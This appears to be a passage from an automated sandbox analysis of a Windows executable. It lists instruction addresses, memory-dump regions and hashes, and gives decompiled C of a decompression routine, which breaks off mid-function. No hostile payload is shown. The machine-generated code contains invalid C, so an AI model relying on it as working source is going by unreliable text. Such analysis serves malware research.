                                                                                                                    0x004065be
                                                                                                                    0x004065cc
                                                                                                                    0x004065cf
                                                                                                                    0x004065d2
                                                                                                                    0x004065d2
                                                                                                                    0x004065d5
                                                                                                                    0x004065d8
                                                                                                                    0x004065db
                                                                                                                    0x004065db
                                                                                                                    0x004065de
                                                                                                                    0x004065e5
                                                                                                                    0x004065ea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406678
                                                                                                                    0x00406678
                                                                                                                    0x0040667c
                                                                                                                    0x00406a1a
                                                                                                                    0x00000000
                                                                                                                    0x00406a1a
                                                                                                                    0x00406682
                                                                                                                    0x00406685
                                                                                                                    0x00406688
                                                                                                                    0x0040668c
                                                                                                                    0x0040668f
                                                                                                                    0x00406695
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x0040669a
                                                                                                                    0x0040669d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040626d
                                                                                                                    0x0040626d
                                                                                                                    0x00406271
                                                                                                                    0x004069de
                                                                                                                    0x00000000
                                                                                                                    0x004069de
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x0040627d
                                                                                                                    0x00406281
                                                                                                                    0x00406284
                                                                                                                    0x0040628a
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628f
                                                                                                                    0x00406292
                                                                                                                    0x00406292
                                                                                                                    0x00406295
                                                                                                                    0x00406298
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040629e
                                                                                                                    0x004062a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004062aa
                                                                                                                    0x004062aa
                                                                                                                    0x004062ae
                                                                                                                    0x004062b1
                                                                                                                    0x004062b4
                                                                                                                    0x004062b7
                                                                                                                    0x004062ba
                                                                                                                    0x004062bb
                                                                                                                    0x004062be
                                                                                                                    0x004062c0
                                                                                                                    0x004062c6
                                                                                                                    0x004062c9
                                                                                                                    0x004062cc
                                                                                                                    0x004062cf
                                                                                                                    0x004062d2
                                                                                                                    0x004062d5
                                                                                                                    0x004062d8
                                                                                                                    0x004062f4
                                                                                                                    0x004062f7
                                                                                                                    0x004062fa
                                                                                                                    0x004062fd
                                                                                                                    0x00406304
                                                                                                                    0x00406308
                                                                                                                    0x0040630a
                                                                                                                    0x0040630e
                                                                                                                    0x004062da
                                                                                                                    0x004062da
                                                                                                                    0x004062de
                                                                                                                    0x004062e6
                                                                                                                    0x004062eb
                                                                                                                    0x004062ed
                                                                                                                    0x004062ef
                                                                                                                    0x004062ef
                                                                                                                    0x00406311
                                                                                                                    0x00406318
                                                                                                                    0x0040631b
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406326
                                                                                                                    0x00406326
                                                                                                                    0x0040632a
                                                                                                                    0x004069ea
                                                                                                                    0x00000000
                                                                                                                    0x004069ea
                                                                                                                    0x00406330
                                                                                                                    0x00406333
                                                                                                                    0x00406336
                                                                                                                    0x0040633a
                                                                                                                    0x0040633d
                                                                                                                    0x00406343
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406348
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x00406351
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406353
                                                                                                                    0x00406356
                                                                                                                    0x00406359
                                                                                                                    0x0040635c
                                                                                                                    0x0040635f
                                                                                                                    0x00406362
                                                                                                                    0x00406365
                                                                                                                    0x00406368
                                                                                                                    0x0040636b
                                                                                                                    0x0040636e
                                                                                                                    0x00406371
                                                                                                                    0x00406389
                                                                                                                    0x0040638c
                                                                                                                    0x0040638f
                                                                                                                    0x00406392
                                                                                                                    0x00406392
                                                                                                                    0x00406395
                                                                                                                    0x00406399
                                                                                                                    0x0040639b
                                                                                                                    0x00406373
                                                                                                                    0x00406373
                                                                                                                    0x0040637b
                                                                                                                    0x00406380
                                                                                                                    0x00406382
                                                                                                                    0x00406384
                                                                                                                    0x00406384
                                                                                                                    0x0040639e
                                                                                                                    0x004063a5
                                                                                                                    0x004063a8
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x004063a8
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063ea
                                                                                                                    0x004063ea
                                                                                                                    0x004063ee
                                                                                                                    0x004069f6
                                                                                                                    0x00000000
                                                                                                                    0x004069f6
                                                                                                                    0x004063f4
                                                                                                                    0x004063f7
                                                                                                                    0x004063fa
                                                                                                                    0x004063fe
                                                                                                                    0x00406401
                                                                                                                    0x00406407
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x0040640c
                                                                                                                    0x0040640f
                                                                                                                    0x0040640f
                                                                                                                    0x00406415
                                                                                                                    0x004063b3
                                                                                                                    0x004063b3
                                                                                                                    0x004063b6
                                                                                                                    0x00000000
                                                                                                                    0x004063b6
                                                                                                                    0x00406417
                                                                                                                    0x00406417
                                                                                                                    0x0040641a
                                                                                                                    0x0040641d
                                                                                                                    0x00406420
                                                                                                                    0x00406423
                                                                                                                    0x00406426
                                                                                                                    0x00406429
                                                                                                                    0x0040642c
                                                                                                                    0x0040642f
                                                                                                                    0x00406432
                                                                                                                    0x00406435
                                                                                                                    0x0040644d
                                                                                                                    0x00406450
                                                                                                                    0x00406453
                                                                                                                    0x00406456
                                                                                                                    0x00406456
                                                                                                                    0x00406459
                                                                                                                    0x0040645d
                                                                                                                    0x0040645f
                                                                                                                    0x00406437
                                                                                                                    0x00406437
                                                                                                                    0x0040643f
                                                                                                                    0x00406444
                                                                                                                    0x00406446
                                                                                                                    0x00406448
                                                                                                                    0x00406448
                                                                                                                    0x00406462
                                                                                                                    0x00406469
                                                                                                                    0x0040646c
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x004066fb
                                                                                                                    0x004066fb
                                                                                                                    0x004066ff
                                                                                                                    0x00406a26
                                                                                                                    0x00000000
                                                                                                                    0x00406a26
                                                                                                                    0x00406705
                                                                                                                    0x00406708
                                                                                                                    0x0040670b
                                                                                                                    0x0040670f
                                                                                                                    0x00406712
                                                                                                                    0x00406718
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064cb
                                                                                                                    0x004064cb
                                                                                                                    0x004064ce
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004068c7
                                                                                                                    0x004068cb
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068f0
                                                                                                                    0x004068f7
                                                                                                                    0x00000000
                                                                                                                    0x004068f7
                                                                                                                    0x004068cd
                                                                                                                    0x004068d0
                                                                                                                    0x004068d3
                                                                                                                    0x004068d6
                                                                                                                    0x004068dd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004069b8
                                                                                                                    0x004069bb
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065f2
                                                                                                                    0x004065f4
                                                                                                                    0x004065fb
                                                                                                                    0x004065fc
                                                                                                                    0x004065fe
                                                                                                                    0x00406601
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406609
                                                                                                                    0x0040660c
                                                                                                                    0x0040660f
                                                                                                                    0x00406611
                                                                                                                    0x00406613
                                                                                                                    0x00406613
                                                                                                                    0x00406614
                                                                                                                    0x00406617
                                                                                                                    0x0040661e
                                                                                                                    0x00406621
                                                                                                                    0x0040662f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406914
                                                                                                                    0x00406914
                                                                                                                    0x00406918
                                                                                                                    0x00406a50
                                                                                                                    0x00000000
                                                                                                                    0x00406a50
                                                                                                                    0x0040691e
                                                                                                                    0x00406921
                                                                                                                    0x00406924
                                                                                                                    0x00406928
                                                                                                                    0x0040692b
                                                                                                                    0x00406931
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406936
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406637
                                                                                                                    0x0040663a
                                                                                                                    0x00406670
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a3
                                                                                                                    0x004067a3
                                                                                                                    0x004067a6
                                                                                                                    0x004067a8
                                                                                                                    0x00406a32
                                                                                                                    0x00000000
                                                                                                                    0x00406a32
                                                                                                                    0x004067ae
                                                                                                                    0x004067b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067b7
                                                                                                                    0x004067bb
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x00000000
                                                                                                                    0x004067be
                                                                                                                    0x0040663c
                                                                                                                    0x0040663e
                                                                                                                    0x00406640
                                                                                                                    0x00406642
                                                                                                                    0x00406645
                                                                                                                    0x00406646
                                                                                                                    0x00406648
                                                                                                                    0x0040664a
                                                                                                                    0x0040664d
                                                                                                                    0x00406650
                                                                                                                    0x00406666
                                                                                                                    0x0040666b
                                                                                                                    0x004066a3
                                                                                                                    0x004066a3
                                                                                                                    0x004066a7
                                                                                                                    0x004066d3
                                                                                                                    0x004066d5
                                                                                                                    0x004066dc
                                                                                                                    0x004066df
                                                                                                                    0x004066e2
                                                                                                                    0x004066e2
                                                                                                                    0x004066e7
                                                                                                                    0x004066e7
                                                                                                                    0x004066e9
                                                                                                                    0x004066ec
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x00406723
                                                                                                                    0x00406723
                                                                                                                    0x00406726
                                                                                                                    0x00406729
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x00000000
                                                                                                                    0x0040679d
                                                                                                                    0x0040672b
                                                                                                                    0x00406731
                                                                                                                    0x00406734
                                                                                                                    0x00406737
                                                                                                                    0x0040673a
                                                                                                                    0x0040673d
                                                                                                                    0x00406740
                                                                                                                    0x00406743
                                                                                                                    0x00406746
                                                                                                                    0x00406749
                                                                                                                    0x0040674c
                                                                                                                    0x00406765
                                                                                                                    0x00406767
                                                                                                                    0x0040676a
                                                                                                                    0x0040676b
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406773
                                                                                                                    0x00406775
                                                                                                                    0x00406777
                                                                                                                    0x0040677a
                                                                                                                    0x0040677c
                                                                                                                    0x0040677f
                                                                                                                    0x00406783
                                                                                                                    0x00406785
                                                                                                                    0x00406785
                                                                                                                    0x00406786
                                                                                                                    0x00406789
                                                                                                                    0x0040678c
                                                                                                                    0x0040674e
                                                                                                                    0x0040674e
                                                                                                                    0x00406756
                                                                                                                    0x0040675b
                                                                                                                    0x0040675d
                                                                                                                    0x00406760
                                                                                                                    0x00406760
                                                                                                                    0x0040678f
                                                                                                                    0x00406796
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406796
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066ae
                                                                                                                    0x004066b1
                                                                                                                    0x004066b4
                                                                                                                    0x004066b7
                                                                                                                    0x004066b9
                                                                                                                    0x004066bc
                                                                                                                    0x004066bf
                                                                                                                    0x004066bf
                                                                                                                    0x004066c2
                                                                                                                    0x004066c2
                                                                                                                    0x004066c5
                                                                                                                    0x004066cc
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066cc
                                                                                                                    0x00406652
                                                                                                                    0x00406655
                                                                                                                    0x00406657
                                                                                                                    0x0040665a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063b9
                                                                                                                    0x004063b9
                                                                                                                    0x004063bd
                                                                                                                    0x00406a02
                                                                                                                    0x00000000
                                                                                                                    0x00406a02
                                                                                                                    0x004063c3
                                                                                                                    0x004063c6
                                                                                                                    0x004063c9
                                                                                                                    0x004063cc
                                                                                                                    0x004063cf
                                                                                                                    0x004063d2
                                                                                                                    0x004063d5
                                                                                                                    0x004063d7
                                                                                                                    0x004063da
                                                                                                                    0x004063dd
                                                                                                                    0x004063e0
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406544
                                                                                                                    0x00406544
                                                                                                                    0x00406548
                                                                                                                    0x00406a0e
                                                                                                                    0x00000000
                                                                                                                    0x00406a0e
                                                                                                                    0x0040654e
                                                                                                                    0x00406551
                                                                                                                    0x00406554
                                                                                                                    0x00406557
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x0040655c
                                                                                                                    0x0040655f
                                                                                                                    0x00406562
                                                                                                                    0x00406565
                                                                                                                    0x00406568
                                                                                                                    0x0040656b
                                                                                                                    0x0040656c
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x00406571
                                                                                                                    0x00406574
                                                                                                                    0x00406577
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657d
                                                                                                                    0x0040657f
                                                                                                                    0x0040657f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067cb
                                                                                                                    0x004067ce
                                                                                                                    0x004067d1
                                                                                                                    0x004067d4
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d9
                                                                                                                    0x004067dc
                                                                                                                    0x004067df
                                                                                                                    0x004067e2
                                                                                                                    0x004067e5
                                                                                                                    0x004067e8
                                                                                                                    0x004067e9
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067ee
                                                                                                                    0x004067f1
                                                                                                                    0x004067f4
                                                                                                                    0x004067f7
                                                                                                                    0x004067fa
                                                                                                                    0x004067fe
                                                                                                                    0x00406800
                                                                                                                    0x00406803
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00000000
                                                                                                                    0x00406582
                                                                                                                    0x00406803
                                                                                                                    0x00406a38
                                                                                                                    0x00406a5a
                                                                                                                    0x00406a60
                                                                                                                    0x00406a62
                                                                                                                    0x00406a69
                                                                                                                    0x00406a6b
                                                                                                                    0x00406a72
                                                                                                                    0x00406a76
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a6f
                                                                                                                    0x00000000
                                                                                                                    0x00406a6f
                                                                                                                    0x004068bc
                                                                                                                    0x00406942
                                                                                                                    0x00406948
                                                                                                                    0x0040694b
                                                                                                                    0x0040694e
                                                                                                                    0x00406951
                                                                                                                    0x00406954
                                                                                                                    0x00406957
                                                                                                                    0x0040695a
                                                                                                                    0x0040695d
                                                                                                                    0x00406963
                                                                                                                    0x0040697c
                                                                                                                    0x0040697f
                                                                                                                    0x00406982
                                                                                                                    0x00406985
                                                                                                                    0x00406989
                                                                                                                    0x0040698b
                                                                                                                    0x0040698c
                                                                                                                    0x0040698f
                                                                                                                    0x00406965
                                                                                                                    0x00406965
                                                                                                                    0x0040696d
                                                                                                                    0x00406972
                                                                                                                    0x00406974
                                                                                                                    0x00406977
                                                                                                                    0x00406977
                                                                                                                    0x00406999
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00406999
                                                                                                                    0x00000000
                                                                                                                    0x0040680e

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                                                                                    • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                                                                                                    • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                                                                                    • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
